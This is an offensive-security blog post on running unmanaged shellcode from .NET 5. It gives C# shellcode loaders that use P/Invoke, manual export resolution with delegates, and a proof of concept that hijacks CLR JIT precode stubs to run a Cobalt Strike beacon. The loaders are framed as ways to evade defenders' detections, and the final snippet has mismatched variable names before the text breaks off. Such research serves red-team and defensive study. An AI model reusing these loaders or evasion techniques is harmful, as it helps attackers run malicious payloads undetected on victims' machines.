« Back to home

Weird Ways to Run Unmanaged Code in .NET

Weird Ways to Run Unmanaged Code in .NET
Posted on

low-level dotnet
15 min read

Ever since the release of the .NET framework, the offensive security industry has spent a considerable amount of time crafting .NET projects to accommodate unmanaged code. Usually this comes in the form of a loader, wrapping payloads like Cobalt Strike beacon and invoking executable memory using a few P/Invoke imports. But with endless samples being studied by defenders, the process of simply dllimport’ing Win32 APIs has become more of a challenge, giving rise to alternate techniques such as D/Invoke.

Recently I have been looking at the .NET Common Language Runtime (CLR) internals and wanted to understand what further techniques may be available for executing unmanaged code from the managed runtime. This post contains a snippet of some of the weird techniques that I found.

The samples in this post will focus on .NET 5.0 executing x64 binaries on Windows. The decision by Microsoft to unify .NET means that moving forwards we are going to be working with a single framework rather than the current fragmented set of versions we’ve been used to. That being said, all of the areas discussed can be applied to earlier versions of the .NET framework, other architectures and operating systems… let’s get started.

A Quick History Lesson

What are we typically trying to achieve when executing unmanaged code in .NET? Often for us as Red Teamer’s we are looking to do something like running a raw beacon payload, where native code is executed from within a C# wrapper.

For a long time, the most common way of doing this looked something like:

[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

[DllImport("kernel32.dll")]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

public static void StartShellcode(byte[] shellcode)
{
    uint threadId;

    IntPtr alloc = VirtualAlloc(IntPtr.Zero, shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);
    if (alloc == IntPtr.Zero) {
        return;
    }

    Marshal.Copy(shellcode, 0, alloc, shellcode.Length);
    IntPtr threadHandle = CreateThread(IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, out threadId);
    WaitForSingleObject(threadHandle, 0xFFFFFFFF);
}

And all was fine, however it did not take long before defenders realised that a .NET binary referencing a bunch of suspicious methods provided a good indicator that the binary warranted further investigation:

And as an example of the obvious indicators that these imported methods yield, you will see that if you try and compile the above example on a machine protected by Defender, Microsoft will pop up a nice warning that you’ve just infected yourself with VirTool:MSIL/Viemlod.gen!A.

So with these detections throwing a spanner in the works, techniques of course evolved. One such evolution of unmanaged code execution came from the awesome research completed by @fuzzysec and @TheRealWover, who introduced the D/Invoke technique. If we exclude the projects DLL loader for the moment, the underlying technique to transition from managed to unmanaged code used by D/Invoke is facilitated by a crucial method, Marshal.GetDelegateForFunctionPointer. And if we look at the documentation, Microsoft tells us that this method “Converts an unmanaged function pointer to a delegate”. This gets around the fundamental problem of exposing those nasty imports, forcing defenders to go beyond the ImplMap table. A simple example of how we might use Marshal.GetDelegateForFunctionPointer to execute unmanaged code within a x64 process would be:

[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate IntPtr VirtualAllocDelegate(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate IntPtr ShellcodeDelegate();

public static IntPtr GetExportAddress(IntPtr baseAddr, string name)
{
    var dosHeader = Marshal.PtrToStructure<IMAGE_DOS_HEADER>(baseAddr);
    var peHeader = Marshal.PtrToStructure<IMAGE_OPTIONAL_HEADER64>(baseAddr + dosHeader.e_lfanew + 4 + Marshal.SizeOf<IMAGE_FILE_HEADER>());
    var exportHeader = Marshal.PtrToStructure<IMAGE_EXPORT_DIRECTORY>(baseAddr + (int)peHeader.ExportTable.VirtualAddress);

    for (int i = 0; i < exportHeader.NumberOfNames; i++)
    {
        var nameAddr = Marshal.ReadInt32(baseAddr + (int)exportHeader.AddressOfNames + (i * 4));
        var m = Marshal.PtrToStringAnsi(baseAddr + (int)nameAddr);
        if (m == "VirtualAlloc")
        {
            var exportAddr = Marshal.ReadInt32(baseAddr + (int)exportHeader.AddressOfFunctions + (i * 4));
            return baseAddr + (int)exportAddr;
        }
    }

    return IntPtr.Zero;
}

public static void StartShellcodeViaDelegate(byte[] shellcode)
{
    IntPtr virtualAllocAddr = IntPtr.Zero;

    foreach (ProcessModule module in Process.GetCurrentProcess().Modules)
    {
        if (module.ModuleName.ToLower() == "kernel32.dll")
        {
            virtualAllocAddr = GetExportAddress(module.BaseAddress, "VirtualAlloc");
        }
    }

    var VirtualAlloc = Marshal.GetDelegateForFunctionPointer<VirtualAllocDelegate>(virtualAllocAddr);
    var execMem = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);

    Marshal.Copy(shellcode, 0, execMem, shellcode.Length);

    var shellcodeCall = Marshal.GetDelegateForFunctionPointer<ShellcodeDelegate>(execMem);
    shellcodeCall();
}

So, with these methods out in the wild, are there any other techniques that we have available to us?

Targeting What We Cannot See

One of the areas hidden from casual .NET developers is the underlying CLR itself. Thankfully, Microsoft releases the source code for the CLR on GitHub, giving us a peek into how this beast actually operates.

Let’s start by looking at a very simple application:

using System;
using System.Runtime.InteropServices;

namespace Test
{
    public class Test
    {
        public static void Main(string[] args)
        {
            var testObject = "XPN TEST";
            GCHandle handle = GCHandle.Alloc("HELLO");
            IntPtr parameter = (IntPtr)handle;
            Console.WriteLine("testObject at addr: {0}", parameter);
            Console.ReadLine();
        }
    }
}

Once we have this compiled, we can attach WinDBG to gather some information on the internals of the CLR during execution. We’ll start with the pointer outputted by this program and use the !dumpobj command provided by the SOS extension to reveal some information on what the memory address references:

As expected, we see that this memory points to a System.String .NET object, and we find the addresses of various associated fields available to us. The first class that we are going to look at is MethodTable, which represents a .NET class or interface to the CLR. We can inspect this further with a WinDBG helper method of !dumpmt [ADDRESS]:

We can also dump a list of methods associated with the System.String .NET class with !dumpmt -md [ADDRESS]:

So how are the System.String .NET methods found relative to a MethodTable? Well according to what has become a bit of a bible of .NET internals for me, we need to study the EEClass class. We can do this using dt coreclr!EEClass [ADDRESS]:

Again, we see several fields, but of interest to identifying associated .NET methods is the m_pChunks field, which references a MethodDescChunk object consisting of a simple structure:

Appended to a MethodDescChunk object is an array of MethodDesc objects, which represent .NET methods exposed by the .NET class (in our case System.String). Each MethodDesc is aligned to 18 bytes when running within a x64 process:

To retrieve information on this method, we can pass the address over to the !dumpmd helper command which tells us that the first .NET method of our System.String is System.String.Replace:

Now before we continue, it’s worth giving a quick insight into how the JIT compilation process works when executing a method from .NET. As I’ve discussed in previous posts, the JIT process is “lazy” in that a method won’t be JIT’ed up front (with some exceptions which we won’t cover here). Instead compilation is deferred to first use, by directing execution via the coreclr!PrecodeFixupThunk method, which acts as a trampoline to compile the method:

Once a method is executed, the native code is JIT’ed and this trampoline is replaced with a JMP to the actual compiled code.

So how do we find the pointer to this trampoline? Well usually this pointer would live in a slot, which is located within a vector following the MethodTable, which is in turn indexed by the n_wSlotNumber of the MethodDesc object. But in some cases, this pointer immediately follows the MethodDesc object itself, as a so called “Local Slot”. We can tell if this is the case by looking at the m_wFlags member of the MethodDesc object for a method, and seeing if the following flag has been set:

If we dump the memory for our MethodDesc, we can see this pointer being located immediately after the object:

OK with our knowledge of how the JIT process works and some idea of how the memory layout of a .NET method looks in unmanaged land, let’s see if we can use this to our advantage when looking to execute unmanaged code.

Hijacking JIT Compilation to Execute Unmanaged Code

To execute our unmanaged code, we need to gain control over the RIP register, which now that we understand just how execution flows via the JIT process should be relatively straight forward.

To do this we will define a few structures which will help us to follow along and demonstrate our POC code a little more clearly. Let’s start with a MethodTable:

[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
    [FieldOffset(0)]
    public uint m_dwFlags;

    [FieldOffset(0x4)]
    public uint m_BaseSize;

    [FieldOffset(0x8)]
    public ushort m_wFlags2;

    [FieldOffset(0x0a)]
    public ushort m_wToken;

    [FieldOffset(0x0c)]
    public ushort m_wNumVirtuals;

    [FieldOffset(0x0e)]
    public ushort m_wNumInterfaces;

    [FieldOffset(0x10)]
    public IntPtr m_pParentMethodTable;

    [FieldOffset(0x18)]
    public IntPtr m_pLoaderModule;

    [FieldOffset(0x20)]
    public IntPtr m_pWriteableData;

    [FieldOffset(0x28)]
    public IntPtr m_pEEClass;

    [FieldOffset(0x30)]
    public IntPtr m_pPerInstInfo;

    [FieldOffset(0x38)]
    public IntPtr m_pInterfaceMap;
}

Then we will also require a EEClass:

[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
    [FieldOffset(0)]
    public IntPtr m_pGuidInfo;

    [FieldOffset(0x8)]
    public IntPtr m_rpOptionalFields;

    [FieldOffset(0x10)]
    public IntPtr m_pMethodTable;

    [FieldOffset(0x18)]
    public IntPtr m_pFieldDescList;

    [FieldOffset(0x20)]
    public IntPtr m_pChunks;
}

Next we need our MethodDescChunk:

[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
    [FieldOffset(0)]
    public IntPtr m_methodTable;

    [FieldOffset(8)]
    public IntPtr m_next;

    [FieldOffset(0x10)]
    public byte m_size;

    [FieldOffset(0x11)]
    public byte m_count;

    [FieldOffset(0x12)]
    public byte m_flagsAndTokenRange;
}

And finally a MethodDesc:

[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
    [FieldOffset(0)]
    public ushort m_wFlags3AndTokenRemainder;

    [FieldOffset(2)]
    public byte m_chunkIndex;

    [FieldOffset(0x3)]
    public byte m_bFlags2;

    [FieldOffset(0x4)]
    public ushort m_wSlotNumber;

    [FieldOffset(0x6)]
    public ushort m_wFlags;

    [FieldOffset(0x8)]
    public IntPtr TempEntry;
}

With each structure defined, we’ll work with the System.String type and populate each struct:

Type t = typeof(System.String);
var mt = Marshal.PtrToStructure<MethodTable>(t.TypeHandle.Value);
var ee = Marshal.PtrToStructure<EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<MethodDescChunk>(ee.m_pChunks);
var md = Marshal.PtrToStructure<MethodDesc>(ec.m_pChunks + 0x18);

One snippet from above worth mentioning is t.TypeHandle.Value. Usefully for us, .NET provides us with a way to find the address of a MethodTable via the TypeHandle property of a type. This saves us some time hunting through memory when we are looking to target a .NET class such as the above System.String type.

Once we have the CLR structures for the System.String type, we can find our first .NET method pointer which as we saw above points to System.String.Replace:

// Located at MethodDescChunk_ptr + sizeof(MethodDescChunk) + sizeof(MethodDesc)
IntPtr stub = Marshal.ReadIntPtr(ee.m_pChunks + 0x18 + 0x8);

This gives us an IntPtr pointing to RWX protected memory, which we know is going to be executed once we invoke the System.String.Replace method for the first time, which will be when JIT compilation kicks in. Let’s see this in action by jmp‘ing to some unmanaged code. We will of course use a Cobalt Strike beacon to demonstrate this:

byte[] shellcode = System.IO.File.ReadAllBytes("beacon.bin");
mem = VirtualAlloc(IntPtr.Zero, shellcode.Length, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);
if (mem == IntPtr.Zero) {
    return;
}

Marshal.Copy(shellcode, 0, ptr2, shellcode.Length);

// Now we invoke our unmanaged code
"ANYSTRING".Replace("XPN","WAZ'ERE", true, null);

Put together we get code like this: